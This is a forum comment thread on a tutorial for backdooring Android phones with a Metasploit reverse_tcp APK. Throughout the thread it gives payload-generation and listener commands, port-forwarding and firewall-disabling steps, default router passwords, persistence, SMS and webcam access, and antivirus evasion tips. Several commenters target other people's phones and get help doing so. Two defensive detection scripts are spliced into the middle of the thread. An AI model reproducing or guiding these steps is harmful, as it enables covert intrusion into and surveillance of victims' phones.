I would like to point out that I am completely new, and I am trying this tutorial. However, in following your instructions, I was directed by a message in the terminal to use msfvenom. I don't know what to do. Could you help me?

Solution:HERE

Try this: msfvenom -p android/meterpreter/reverse_tcp LHOST=1.1.1.1 R > android.apk
--------BUT--------

As BAD said in the comments above, msfvenom does not contain the apk format. So just use msfpayload; even if it tells you to use msfvenom, just ignore it, check your root directory and you should see the file has still been created.

Using this command line:
sudo msfpayload android/meterpreter/reversetcp HOST=192.168.1.16 LPORT=4444 R > apss.apk

Error:
Invalid payload: android/meterpreter/reversetcp

I don't know what to do. Plz help me.

I guess you aren't using Kali Linux, because this former BackTrack supports the Android payload.

'reversetcp''

Hey, I want to know: if I want to send it to somebody (not on the same wireless or Wi-Fi), do I have to put the external (public) IP in the Lport?

Yes, but only while creating the payload.

Lebz, I think if you want LAN only, you need to put your internal IP.

Did I configure the port forwarding on my router wrong? Help. Can't connect on WAN. Thank you.

Image via akamaihd.net

Please get me a screenshot of the security options. (Firewall)

Yes, exactly!
But can you access the Internet after disabling the firewall?
If yes, then good!
EDIT: Bold Text

nc -lvp 12345
listening on any 12345 ...
107.20.89.142: inverse host lookup failed: Unknown server error : Connection timed out
connect to 192.168.1.36 from (UNKNOWN) 107.20.89.142 48511

No, no, this process of port forwarding only forwards the ports; it does not open them. Now your port forwarding has been a success!

Just follow the whole hacking process again.
(Also enable DMZ for the host's IP)

Because I saw some video on port forwarding using netcat. Is it wrong? Sorry, newbie.

No, but I won't recommend following it.
Can you access the internet after disabling (your router's) firewall?
Have you tried the procedure again?

Ya, I tried and it still doesn't pop up.

And what is DMZ, sir?

An option in advanced settings which forwards all the ports through the firewall.
EDIT: If it is not in advanced settings, go to WAN settings.

Nothing like DMZ enable or disable on my router. :(

My router doesn't have DMZ enable/disable options, brother.

Actually it has; I saw that from the note in your screenshot above, but never mind now.

Hello bro. I'm new to Kali Linux. I have followed all the steps above, bro, but I get the error
Error running command webcamsnap: NoMethodError undefined method `value' for nil:NilClass

Can you please help me with it? I have used two different Android phones but still get the error. Can I know why? Can you please help me?

webcam_snap 1
webcam_snap 2

It's working on LAN, but kinda hard on WAN. And F.E.A.R, what is this problem?
meterpreter > webcamstream 2
* Starting...
* Preparing player...
* Opening player at: UrXlVixg.html
* Streaming...

  • webcamstart: Operation failed: 1

Nice! Antivirus is blocking the backdoor apk from accessing the camera.

OK, last try!
Exploit your Android again by the WAN method, but this time connect the phone to the same Wi-Fi router (LAN).

Is this exploit patched in the new Android OS? I tried this on VMware and had no luck. Bridged connection/Wi-Fi/eth0 with Kali installed on a VM. I wonder if this only works with a physical Kali deployment? I recall one of my buddies did this hack in class with the USB boot of Kali.

Wait, seriously? I'll have to check that out!
Thanks for the info, Lee.

Fear, can you confirm that this exploit works on a VM?

Yes, it works on a VM, and it has not been patched; however, the in-built anti-virus ends the Meterpreter session quite fast!

EDIT: I cannot get enough time to initialize persistence.

My mistake, FEAR, my firewall was indeed blocking me from the exploit. I noticed in bridged mode I was able to ping Google's DNS but unable to actually browse the web, due to the firewall. Thanks for the tutorial; it's now working on both LAN and WAN for me.

Glad it worked out!
Welcome!

I still have a problem on WAN :| On LAN it's good, but on WAN I don't see my smartphone in my Kali's response :(

Hi!

I successfully installed Kali on VirtualBox, and when I put in the "msfpayload android/meterpreter/reversetcp LHOST=192.168.0.4 R > /root/Upgrader.apk" command, it shows me an error: "bash : /root/Upgrader.apk : Permission denied"

I even tried changing the root folder properties (since I am new to Linux, I have very little idea about superuser and stuff), but nothing is available in either of the folders' permissions tabs. It says that I'm not the owner.

What next? Help!

Hi!
?
Log into the host (Kali) as root (admin).
I mean:
Username: root
Password: "whatever you had entered" OR toor

Can I rename the .apk to anything I want? I mean, if the apk is installed already, the name of the app is MainActivity; can I rename it to anything I want?

Maybe yes, maybe not.
I already tried that, with many fails. Still trying...
But I don't think so; this application, every application, compiles like this by default.

When I try to run the exploit command, it says unknown command.

My version of msfconsole is 4.10.0.

It says the handler failed to bind to my IP address.

Because you haven't put in the host's internal IP.

When I try to scan my phone,
I'm having this problem:

Failed to load extension: No module of the name extserverandroid.jar found.

That happens on the last part, when I type exploit; it finds the device, but it doesn't scan. Forgive my poor English.

I cannot open the Main Activity app on Android while trying to hack my own phone. Also, when I put my LHOST IP and port in the form 192.168.x.xxx:pppp, it loads. While it loads, msfconsole says the session is running (I can't execute commands), and when it stops loading it says the session died. When I reload it, it does not connect. Please help.

Hi,

The Main Activity application opens and remains running in the background, so don't worry. And the session dies because of antivirus (especially if it's inbuilt).

Thanks for this post.
Is there a way to force a device to install the file? Could it be done?
I don't intend to do it that way, but I'm just curious.

Yes! Use scripts. {I haven't tried that before; I think maybe we will need root to FORCE install it (or maybe not)}

Hey Dear F.E.A.R,
I did everything you did exactly, but when I open the trojan on my Android device it shows me this on the msfconsole:

Like, it's trying to connect but without success.
Thanks for your tutorial btw^

Hmm..
Androids are being upgraded to 5.0.2 (i.e. Lollipop).
So I see most people are getting errors while exploiting them,
like the session dying immediately, etc.
You/We need to upgrade our Kali too (new version 1.1.0)
and then use the upgraded metasploit-framework.

Thx for the answer.
Is it possible to update Kali from Kali itself?
From something like apt-get update or something?
thx^^

Yes, why not!
Type this in a terminal:
rm -rf /var/lib/apt/lists
apt-get upgrade
apt-get update
apt-get dist-upgrade
--------OR-------
To do everything simultaneously type:
rm -rf /var/lib/apt/lists
apt-get upgrade && apt-get update && apt-get dist-upgrade
Reboot when completed.
(If an error occurs then reply, which I think it will)

Hey F.E.A.R ,
The Update
Another thing, can you explain to me how to port forward?
I want it to work on WAN, and after I port forward, can trojans like shikata_ga_nai work on my friends' PCs?
thx

For that I'll need your router's company name and model no. (and version, if any).

It's a NetGear VEGN2610.

I've seen some ways to port forward, but it requires a username and password, and when I tried to get in it wasn't admin and password.

Then try these:

  1. Admin Password
  2. admim Password
  3. Admin password
  4. admin pass
  5. admin admin

If they don't work, press your router's hard reset button to switch the password back to the default.

To port forward, follow this guide: here

Add 2 services, one with port 4444 and the other with 8080.
Then go to firewall rules and allow these services through.
(Choose 'any' everywhere except Logs; keep the logs at 'never')
Also, in the inbound rules (of firewall rules) put the Kali/host's internal IP address.
Also, don't use any port checker tool to see if the ports are forwarded; just try a hack.

OK, great, thx. I have hard reset the modem
and I did it all; now only to try the WAN backdoor :D
thanks

There is a start port and a finish port;
what do they mean?

That means the range of ports that has to be forwarded.
Just put port 4444 into both of them.

I'm failing to change the inbound rules too, because it asks for a valid service and I don't know what that means.

First select the service you created, then edit its inbound and outbound rules.

Hey,
I didn't find the place to write the Kali/host's internal IP address. And for the ports,

is that the way it's supposed to be?

thanks^

Yes, because you have only configured the outbound rules.
Do you see that link below in the screenshot?
It states: "Click here to set up inbound...."
When you set up inbound rules, then you will be asked for Kali's IP.

Ohhhhh, thanks!
The Kali IP that I need to insert is the LAN IP?
Something like 10.0.0.6
thx

Yes; use the cmd ifconfig to confirm the IP.
Make SURE it is static, or you will have to change the inbound rules again whenever you try to hack on WAN.
Welcome!

What do you mean, make sure it's static?
Like, how do I make sure of it? It is always the same, 10.0.0.6,
when I write ifconfig.
:D
thx

Btw, the trojan is again not working, showing the same problem, like trying to connect but with no success, even though I've upgraded the Kali.

Now upgrade the Metasploit framework: msfupdate

Good to hear that!

Another question:
how do I remove the persistence from the phone?

Reboot the phone (if you haven't followed the method which needs root) or kill the script from a task killer (I recommend rebooting).

Tomer:
(Replying here as there was no space for another reply left)
OK, don't go into that topic; just make sure it is the same every time you start the hacking procedure.
If it changes sometime, just use this cmd to change it back:

  • ifconfig eth0 10.0.0.6 (if you are using Ethernet connection(wired one))
  • ifconfig wlan0 10.0.0.6 (if you are connected using wireless connection)

---
Now that you have done all the configurations, why not test them: hack an Android over the Internet!

Okiii,
Thx for the great communication :D
Omw to hack over the Internet!

Welcome, friend,
:)

Hi, I have done this and I was able to hack Android Jelly Bean, but when I tried on Android KitKat it's not working; when I try to take a webcam snap it shows an error. Is there any way of doing that?

Hi Amal,
Read the above comment
/\
|

I have just downloaded the kali-linux-1.1.0a ISO 32-bit and installed it on a VM, but this hack doesn't work on that; it always shows an error. Please help.

Which error does it show? I want you to be specific, so that I can help you.
And you didn't have to download the whole new version of the host; you could have simply updated it, but never mind.

I am using a TP-Link router... I am having a tough time forwarding...

Be specific: model no.?

I am getting this error while doing this. What can I do with this? Please help, F.E.A.R.

Is the connection stable? (That is, your session doesn't die frequently)
Try this:
webcam_snap 1 -i
webcam_snap 2 -i
Or maybe the application is denied from accessing the camera internally.

Just a simple question, cuz I'm just a beginner:
if the victims removed the apk after opening it.. will I still be able to access their phone, or is it hard to remove?

A simple answer:
If the victim removes the setup apk, then the session remains.
If the victim removes the installed application (Main Activity), then the session will die.
It's really easy to remove, like any other application.
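The thread keeps coming back to the installed app showing up as "Main Activity" and to built-in antivirus catching it. From the defender's side the cheapest check is to look inside an APK for the class names of Metasploit's stock Android stage before anyone installs it. The script below is an added example and is not code from the original thread or from the Metasploit project; it assumes the stage's Dalvik classes live under com.metasploit.stage (the package Metasploit's unmodified Android payload uses), and it constructs two sample APKs in memory rather than reading real files.

```python
"""Flag APKs that carry Metasploit's stock Android stage.

Added example, not code from the thread.  Assumption: the unmodified
Metasploit Android payload keeps its classes under com.metasploit.stage,
and Dalvik class descriptors are stored as plain strings in classes.dex,
so the descriptor prefix is visible with a raw byte search.
"""
import io
import zipfile

# Descriptor prefix as it appears in classes.dex for that package (assumption).
MSF_STAGE_MARKER = b"Lcom/metasploit/stage/"


def apk_has_msf_stage(apk_bytes: bytes) -> bool:
    """Return True if any classes*.dex in the APK references the stage package.

    Raises ValueError when the input is not a zip container at all, so a
    truncated download is reported rather than silently passed as clean.
    """
    try:
        archive = zipfile.ZipFile(io.BytesIO(apk_bytes))
    except zipfile.BadZipFile as exc:
        raise ValueError("not a valid APK (zip) file") from exc
    with archive:
        for name in archive.namelist():
            # Multidex apps ship classes.dex, classes2.dex, ... at the root.
            if name.startswith("classes") and name.endswith(".dex"):
                if MSF_STAGE_MARKER in archive.read(name):
                    return True
    return False


def scan_apks(apks: dict) -> dict:
    """Map each APK name to True (marker found) or False (no marker)."""
    return {name: apk_has_msf_stage(data) for name, data in apks.items()}


def build_sample_apk(dex_strings: bytes) -> bytes:
    """Constructed sample: a minimal zip that mimics an APK's layout.

    The fake classes.dex is just a dex magic followed by the descriptor
    strings we want the scanner to see; it is not a loadable dex.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("AndroidManifest.xml", b"<placeholder/>")
        archive.writestr("classes.dex", b"dex\n035\x00" + dex_strings)
    return buf.getvalue()


# Constructed inputs: one "Upgrader.apk" carrying the stage descriptors,
# one ordinary app whose only class is its own MainActivity.
SUSPECT_APK = build_sample_apk(
    b"Lcom/metasploit/stage/MainActivity;Lcom/metasploit/stage/Payload;"
)
BENIGN_APK = build_sample_apk(b"Lcom/example/notes/MainActivity;")

if __name__ == "__main__":
    for name, flagged in scan_apks(
        {"Upgrader.apk": SUSPECT_APK, "notes.apk": BENIGN_APK}
    ).items():
        print(f"{name}: {'metasploit stage marker found' if flagged else 'clean'}")
```

The check is a string heuristic, not a verdict: it catches the unmodified payload the thread is built around, while a repackaged APK whose package was renamed would not carry the marker, so it belongs alongside, not instead of, the on-device antivirus the replies mention.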

Yes, my connection is stable, and I have hacked the same phone in Kali 1.0.7, but it's not able to hack now in Kali 1.1.0a. I have tried those two commands but they're not working. Which version of Metasploit and Kali are you using?

Don't worry about me; I corrupted my Kali.
Update your Metasploit: msfupdate

I get this on the first step:
The utility msfpayload is deprecated!

And also, how do I write the external IP if it changes occasionally? (I don't know about port forwarding)

I'm really a beginner :D

Use this command (tested at last):

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > android.apk
  • Ignore the errors.
  • Go to the root/home folder, right click on the .apk
  • Click Properties, go to the Permissions tab.
  • Tick the check-box for 'Allow executing file as a program'
  • And then, I think you know what to do... (follow the remaining guide)

First finish/complete the hack test on LAN, then go for WAN afterwards, instead of just jumping to it. :) (step-by-step progression)

  • To check your external IP, type this into Google (/default search engine):
  • "What's my IP"
  • For port forwarding, first search about it on a search engine, then give your router's company name and model no. (and version, if any).

All is well that ends well :D

It's working on both now, thanks a lot.

I just have a problem with streaming & taking a snapshot, but it's not a big deal. :)

Good to hear that! ;)
And you are welcome!
(The in-built antivirus blocks the application from turning on/using the camera)

Hello sir, I am not able to understand the method clearly. I have done it step by step, but still I am not able to get a connection. Firstly I have some questions: 1. I am using Kali Linux on VMware and using a Wi-Fi modem, so is that any problem? Do I have to make changes in my Wi-Fi modem? 2. I don't know what to set at port, so I set 80, but it won't work. 3. I am using my private IP address at LHOST and LPORT 80; it's not working. Plz help.

I am using a TP-Link modem, model no. TL-WR740N / TL-WR740ND.

Hello Mayank,
Welcome to Null-Byte.
First, which method are you using, LAN or WAN (Internet)? If LAN, then I'll answer your questions like this:
1) Yes, you have to, but not in your Wi-Fi.

  • Go to settings of the Virtual Machine and Change the Network Adapter settings to Bridged (Automatic)
  • Turn off any firewalls (except windows firewall)

2) Don't set any LPORTs anywhere; let the machine stick to the default one (4444)
3) Keep using the private IP of the host machine, i.e. Kali (not Windows)
---------------------------------NOW My Questions--------------------------------------
Q1. Is the Device/Android connected on the same Wi-Fi Network (LAN) ?
Q2. Have you successfully created the .apk, installed and opened it on the target Android?
Q3. Have you ever tried to hack a PC before?

I have tried the LAN method and successfully gained access.
I will try the WAN method.
But PLEASE let me know the list of commands that we can perform on Android devices.
Thank you... Thank you.

Hi Jessy, welcome to Null-Byte.
When you get the Meterpreter session, type:
help or ?
You'll get all the commands that you want to know.

---------------------------------NOW My Questions--------------------------------------
Q1. Is the Device/Android connected on the same Wi-Fi Network (LAN) ?
Q2. Have you successfully created the .apk, installed and opened it on the target Android?
Q3. Have you ever tried to hack a PC before?

  1. Yes, the Android device is connected to the same Wi-Fi network.
  2. Yes, I created the .apk, installed it, and when opened on my Android phone it shows only one option, "reverse tcp", that's it.
  3. No sir, I'm new to the Linux world.

For 2) What? The application is not meant to open; it just runs in the background.
For 3) First you should try hacking a PC (hack the same Windows on which VMware is installed).
Create the executable file:

  • msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.4 X > /root/hi.exe

Set-up the listener:

  • msfconsole
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit

Copy and open/run the file on Windows.

Is installing Kali Linux in VMware (virtual machine) the main problem? Or
should I install Kali Linux directly on the PC (dual boot)?

No; there are complications, but when you get practice, it works fine.
If you want the easy way, then yes, go for dual boot.

As I simply installed Kali Linux on VMware, I think I need to set up some network settings or some other settings on my Kali Linux or VMware. Can u tell me what I should do after installing Kali Linux, or some settings?

I think I have some problem in networking, as I am unable to get back or receive data from the victim device.

Plz suggest some links or other ways to solve the networking problem.

I already told you;
check my reply to your first comment.
Also, I think you should go for dual boot; that's better for you.

Albeit not known as a dumb blonde, I wave the white flag....
Is there someone who can help me, perhaps on an independent consultant basis?
I appreciate any feedback or direction....

HEY!
When I run the msfpayload command, it says:
Invalid payload: android/meterpreter/reversetcp (I typed it with the underscore in the command, though)

Pls help me with this, thanks!

Because you are using BackTrack.

Nope, I'm using it in Kali! I guess it's v1.0.2

Update Kali

Hey F.E.A.R.,
is it because the android sub-directory is missing in the payload directory?
The payload directory goes like:
aix
bsd
java
linux
..
It has windows too, but no android!
I tried doing this with Armitage, same error!

It should fix the missing payload after the update.

Hai... can u help hack an Android phone.... I have no idea, and I need someone to do it to me please

... The tutorial was made for the same purpose...
Sorry I can't help any further, you are on your own...

Android 5.x.x has been giving out the parsing error usually associated with unchecking the "allow installation from unknown sources" check box. This is causing my two most common RATs to be impossible to install on devices. Could it be that someone like yourself has a solution?

Hi.
Imagine that I have access to somebody's phone.
Can I hack and have access to his phone this way even if he is not connected to my Wi-Fi (LHOST IP)?
Thanks.

Hi

Imagine that I have access to somebody's phone and I can install that application that you made. Is it possible to hack and have remote access to his phone even if he is not connected to my Wi-Fi (LHOST IP)?

Thanks

Yes, surely.
I have mentioned it as the WAN method; go through the tutorial again.

Hi Fear, thanks for this tutorial! I have it working almost fully now. However, I can only access the cam and microphone. The Android commands to get SMS and call log, etc. are not there. Is there something more I need to update?

"are not there" what do you mean by that?
'Are not there' when you type help (or ?)?
EDIT: Oh, and Hi Stv

Thanks for the response! Yes. I also watched a video about this and could see on his screen that there was another section in help titled "Android Tools" with dumpcalllog, checkroot, dumpcontacts, dumpsms, and geolocate. I don't have that section, and those commands do not work if I try to use them. I am connected though and can get screenshots.

Hi.

You said that if the victim opens the trojan we are able to do some things with his or her phone. Imagine that he opens the app and after that he closes it. Would I be able to access his phone after he closed it?

(Answer for two situations please: 1. if he closes it in recent apps, or 2. if he just comes out of the app (not closing it in recent apps)).

Thanks a lot for your help.

Hi there,

Sometimes you should try and experiment with these things, and the question you asked proves that you haven't even tried it.

1) The app opens and runs in the background and cannot be closed.
2) If it is closed through the recent apps menu, even then the session doesn't die.
3) For terminating the session, you have to kill the app from a task killer or reboot the Android.

Also, I would like to be able to leave the session and then return later, as in turn off my computer and re-access the same device remotely tomorrow. Is that possible?

Thanks!

Hey Fear, I am kind of surprised that no one else is having issues installing backdoors on Android devices running 5.x.x.

The error is always a parsing type, and I know that the error is 5.x.x specific because I previously tested the Metasploit Android reverse TCP backdoor on the device, but after an update from 4.4 KitKat to 5.0.2 Lollipop, all successive installation attempts have failed.

I don't have any errors while exploiting 5.0.x, only that the session dies quite quickly.
Have you updated you Kali?
Edit: your*

Yes I have, but I will attempt to update it again.

I've got a little problem... I do everything as said, but when I exploit it doesn't give the same result as yours. I did this three times but I still get the same result. Can you tell me what I am doing wrong?

Are you sure the LHOST is Kali's?
Check it using the cmd: ifconfig

I tried this on my friend's phone, who was connected to my network. It says "can't open file". Please help.

What says...? Details please.

I'm getting a permission denied right after entering the trojan. Any thoughts? I'm operating as a standard non-root user.

Entering the trojan? Putting it onto the Android? Do you get this error from the Android?

No, you don't.

Hey, and how do we encrypt it so that it bypasses AV detection?

I don't think there is an option for encrypting the .apks directly (yet). Instead you have to decompile and dissect it, then encrypt it.

Instead of doing all that, I suggest you try the hack; I am sure the application will not get detected by (external) AVs.

Also, welcome to Null-Byte.

Thanks :D Null Byte is really an amazing place..

Hai,

I followed this article to hack my Android device.... but I was not successful in hacking it.

I was stuck near "Sending stage (769536 bytes) to 192.168.1.4"
Please help me, thanks in advance.

Hi,
Yes, that happened with me too (I forgot the solution xD).
I think it happened because the file (.apk) was malformed.
You might have used -X instead of -R (template).

Hi,

I followed all the steps, but when I go to install the .apk on my phone (as a test) it says "Parse error. There was a problem parsing the package." Can anyone help me? I tried changing the permissions on the file to create it as an executable .apk, but still nothing. I even tried msfvenom and everything, but it didn't work either.

Can u post the command u used to make the payload??

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > android.apk
Ignore the errors etc.; the application will still be created.

Okay, I haven't updated my Android to the latest, but it is Lollipop, and the hack works perfectly.
Will let you know once I update it; until then, try for other Androids.

Hello F.E.A.R,
I created the apk over my WAN IP and when I tried to install the apk on my phone it shows me this error.. hope u will help me. :)

Yea, can u post the command u used to make the apk??

No lol, I know about it... I was asking those who get the errors to post the command so we can check for any errors...

lol, I thought you mistakenly replied to them instead of me

msfpayload android/meterpreter/reversetcp LHOSTS xxx.xx.xx.xx R > updater.apk

  1. Check that unknown sources is ticked
  2. Copy the apk to Windows and then copy it to your mobile, to check if the apk was copied correctly, as Kali can sometimes be frustrating to copy to Android

If that doesn't work then it's your Android OS version.. maybe it's too high... nothing can be done... try msfvenom once with hope ;);)

Hi

I am unable to proceed further after exploit.... I am using Kali Linux on VirtualBox

Yeah, same problem I'm facing.. when I switched my PC.. the above problem I was facing on my laptop.

  1. This may be because the default port set in Kali is 4444... so if u hadn't set it to 8080 it won't work..
  2. Try port forwarding the ports
  3. First run the exploit command in the console, then open the app on the phone... if u have already opened it, then close it and reopen the app again

Else it will just be your VM... it can't access it... search Google maybe

Use VMware instead.

Hi, thanks for the reply. I have set the port to 8080. Now I installed VMware but am still facing the same problem.
-> I have set the network to bridged (automatic); also tried keeping it at NAT
-> updated Kali
-> used msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=8080 X > /root/test.exe
and also I tried
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 X > /root/test.exe

I have a dynamic IP and am using Wi-Fi to my PC. I am using a Tenda N301 Wi-Fi.

Damn, the posts here, guys!!! Sooooo many... it takes 20 seconds just to hyperscroll down here lol ;);)

I know this post just increased the length... lol .. =.=

(Intense laughter) xD

I did all the things and everything worked fine till I tried to open the apk; it says it can't open the file (I have enabled Unknown sources). I'm using CyanogenOS 12 based on Lollipop. Someone help please.

It works on that ROM perfectly; try another, better file manager and then open/install the apk.

It works now :) thanks :D

You are welcome :)

Just sent you an inbox, F.E.A.R.

Can your VM connect to the Internet??

Yes, the VM can connect to the Internet.

Type and run exploit... then run the exe as admin...
Try port 4444
Disable antivirus...
Is the VM on the same machine??
Try putting the public IP in LHOST when making the exploit and using the local IP when running the exploit

Remember LHOST is the IP of the Kali system... not Windows... also check if your Kali and Windows have the same local IP.. could be a problem

I'm confused about the IPs here...

I have a 24 Online client net broadband connection. I use it in a wireless router. To access the net I have to use the below IPv4 IP, as without it I can't log in to the 24 client page.

I am using Kali via VMware. By using the command ifconfig I get the below IPs.

While googling my IP I get a different result.

Can u tell me which IP I have to use in the 1st LHOST and 2nd LHOST...

The one you see on Google is your public IP.. for the world...

The one you see on IPv4 is the local IP.. for your Wi-Fi modem... if you type ifconfig in the terminal you'll get the same IP as IPv4 ..i.e... local IP..

1) If you're hacking someone connected to the Wi-Fi you're connected to.. then use the local IP everywhere... the IPv4 one...

2) If you're hacking someone who is not connected to your Wi-Fi at the moment... then when you create the payload using msfpayload or venom... use LHOST as the public IP, or the IP you got on Google...

But when you'll type use payload, then specify the local IP, then type exploit... ;);)

OK, so as a start I'm trying to hack my own phone here. So let's say I am using the data carrier on it, not Wi-Fi.
Now, from the above pics, can u tell which IP is to be used there?
I do get that while creating the payload the one I have googled will be used (if I got it correct :p)
but in the second one, can u tell which IP is to be used here?

Inet addr : 192.168.163.129

OK. I will try with this :)
thanx :)

OK.. so I did everything as told above.
Gave the commands.

Started the console
and

installed the app on my phone, but after I run the apk the blinking of this rectangular dot stops and nothing happens next. Help me please !!!!!!!

Dragon,
At least try the hack on LAN first. (Put your internal IP in 'both' LHOSTs)

OK, I tried with the LAN, and the IP used was the one I get after typing the command ifconfig

Created the payload without using LPORT and got into the console mode

Used the exploit handler with the same commands as described and the same IP used above.

But the same thing happened this time also. Nothing happened after this. :(
What now :o

One more thing. I had gone through the above comments and noticed that you told people to use Bridge Mode rather than using NAT. Well, I can't access the net in bridge mode even after ticking the option given below it. Does it have something to do with the opening of the meterpreter session?

I even tried manually selecting only my LAN connection, still no use... :(

Hey F.E.A.R. I can't use bridge mode on LAN but it is working with WAN somehow, so I gave it a try...
First I tried normally without port forwarding and it again got stuck on starting payload handler.

Then I port forwarded 4444 and 8080

and it worked... it started the meterpreter session. But no command works in it. Moreover the session automatically closes in a few seconds :(

Help me please... :(

LAN gets stuck on starting payload handler and WAN you can see yourself :(

Hi DRAGON,

I think you are on the right track. Your port is actually listening for a connection. So, all you need to do is install the apk on the victim's phone and launch the app called "Main Activity".

In the terminal (msfconsole), you'll see
#Meterpreter session 1 opened (IP:PORT...) then run any command, e.g. dump_sms
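The session described above opens because the implanted app connects outbound from the phone to the listener, and it keeps reconnecting if the handler is not yet up. From the network owner's side that behaviour is what gives it away: a client repeatedly opening connections to one external address and port, often the default handler port 4444 mentioned earlier in the thread. The following Python is an added detection example, not part of the post or of any product; it parses constructed connection-log lines in a simple "time src:port -> dst:port proto" format (the format, the hosts and the 203.0.113.0/24 documentation-range destination are all assumptions) and flags flows that hit the default handler port or show regular beaconing.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample export (not real traffic). One client reconnects to
# 203.0.113.5:4444 every five seconds; the other lines are ordinary web
# traffic and one LAN-internal connection.
SAMPLE_LOG = """\
# time src:port -> dst:port proto
2015-06-10T12:00:01 192.168.0.23:51234 -> 203.0.113.5:4444 tcp
2015-06-10T12:00:06 192.168.0.23:51235 -> 203.0.113.5:4444 tcp
2015-06-10T12:00:11 192.168.0.23:51236 -> 203.0.113.5:4444 tcp
2015-06-10T12:00:16 192.168.0.23:51237 -> 203.0.113.5:4444 tcp
2015-06-10T12:00:03 192.168.0.42:44120 -> 203.0.113.80:443 tcp
2015-06-10T12:03:40 192.168.0.42:44121 -> 198.51.100.7:443 tcp
2015-06-10T12:00:09 192.168.0.23:51240 -> 192.168.0.4:8080 tcp
"""

LINE_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (\w+)$")

# Metasploit's default handler port, as used throughout the thread. A hit on
# it is a weak signal on its own; regular reconnects are the stronger one.
SUSPICIOUS_PORTS = {4444}
MIN_BEACONS = 3      # connections needed before judging regularity
MAX_JITTER = 0.2     # coefficient of variation of inter-arrival times


def parse(log: str) -> list:
    """Turn log text into flow records; lines that do not match are skipped."""
    flows = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, src, _sport, dst, dport, proto = m.groups()
        flows.append({"ts": datetime.fromisoformat(ts), "src": src,
                      "dst": dst, "dport": int(dport), "proto": proto})
    return flows


def detect(log: str) -> list:
    """Group flows by (src, dst, dport) and return the groups that look like
    a reverse-connect implant: default handler port and/or regular beacons."""
    groups = defaultdict(list)
    for f in parse(log):
        groups[(f["src"], f["dst"], f["dport"])].append(f["ts"])

    findings = []
    for (src, dst, dport), times in groups.items():
        reasons = []
        if dport in SUSPICIOUS_PORTS:
            reasons.append("default-handler-port")
        times.sort()
        if len(times) >= MIN_BEACONS:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            mean = statistics.mean(gaps)
            # Low relative spread of the gaps means a timer, not a human.
            if mean > 0 and statistics.pstdev(gaps) / mean <= MAX_JITTER:
                reasons.append("regular-beacon")
        if reasons:
            findings.append({"src": src, "dst": dst, "dport": dport,
                             "count": len(times), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['src']} -> {f['dst']}:{f['dport']} x{f['count']} "
              f"[{', '.join(f['reasons'])}]")
```

The single LAN-internal connection to port 8080 and the two web connections produce no finding; only the client that reconnects to the same external address on 4444 at a fixed interval is reported, with both reasons attached so an analyst can weigh them.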

Actually that's the real problem... I installed the Main Activity app but nothing happens... on the phone the app closes automatically and runs in the background. But in my VMware nothing happens :(

Don't set any LPORTS

Hi F.E.A.R

I'll try to be very specific about my issue in the hope that I'll get a quick response to solve my problem. My computer uses my phone's tethered Wifi, and its IP (the one I get from Settings > About phone > Status) begins with 154.122.XXX.XXX and is dynamic. It is the same one I get when I go to www.whatsmyip.com. First question, is this the public IP of my Android phone? If so, where do I get the phone's internal IP?

When I run 'ifconfig' in the terminal I get a static IP that goes 192.168.43.XX. This does not change despite the other one mentioned earlier changing each time I turn on Wifi tethering. So, is it (192.168.43.XX) my Kali's internal IP? If yes, where do I get its external IP?

Lastly and most importantly, there is a dire need for me to go outside my network this time, and with a payload that will be persistent. Please, could you answer my above questions about IP and give me the command to create a persistent payload that will work on WAN?

I would really appreciate it.

Hi Walter,
Do not jump-start; first try it out on LAN, and if your PC is tethered that means the systems are operating on a LAN.

Yes, 154.122... is your Android's external IP, which you don't need or need to care about.

Look for the internal IP: open WiFi settings, and from the options menu you will get the details of the network (internal IP etc.).

For Kali, you already know the internal IP, i.e. 192.168... However, for the external IP, simply open a browser and visit the same website you mentioned above.

It is too hard to do this hacking with a dynamic IP :(

It's the same as LAN... nothing different, just 1 LHOST lol...
If you don't use a VM and dual-boot Kali like I did... everything will be easy as pie.. ;);)

Thanks F.E.A.R., but I already bought a TP-LINK TL-MR3220 and I'm having trouble configuring port forwarding, especially setting up a static IP for Kali. I at first thought I could just go to the IP Reservation settings on my router or bind an IP to my MAC address and that would be all, but I still saw my IP from ifconfig changing.

Guys, my ultimate goal is to run a reverse TCP on a device that is not connected to my network. Any help?
Again... any idea how to post on this site?

When you're making the payload... in the LHOST you type your public IP... the one you can search for on Google...
Then when you use multi/handler... there you enter LHOST as the IP you get in ifconfig.. i.e.... your local IP...
Run exploit and run the apk on the device not connected to your network...
Enjoy..;);)

I am doing the same, but stuck on "starting the payload handler".
Can you help me in resolving the issue..

Hi, I have Android 5.0.2 and I am also facing the same problem as Dragon. I tried both the IPs but still my Metasploit is stuck in

starting payload handler......

I can't move forward. Any help needed...

Try bridge mode rather than NAT...
Try not setting any LPORT..

I strongly suggest using dual-boot Kali (personal preference) as it doesn't give these hassles.. ;):)

I tried with both a VM and with Kali installed alongside Windows.. but having the same issues.. my phone is running the KitKat version, and I am able to install the app successfully.

Please tell me how to port forward in a ZTE router. Thanks

You need to log in to your router...
There will be an option called port forward or NAT in the menu..

Default username and password is admin.. admin and admin..password...
You can search for your router... just type on Google your router model and after a space portforwarding ;);)

Hi FEAR,
Can this method also be used for devices not connected to the same network, i.e. for devices over the Internet..??
If that's possible, how can that be done? I tried it but got stuck on "starting the payload handler".

You need to put your public IP when you're making the payload....
But when you're exploiting.. then you enter your local IP ;);)

HELP!
I tried the msfpayload line and got an error message
bash: msfpayload: command not found
Why is it not working on my machine?

Msfpayload is discontinued.
It has been replaced by msfvenom.
So you need to use msfvenom.. it's almost the same..

Following the tutorial, you mean I should change msfpayload to msfvenom:
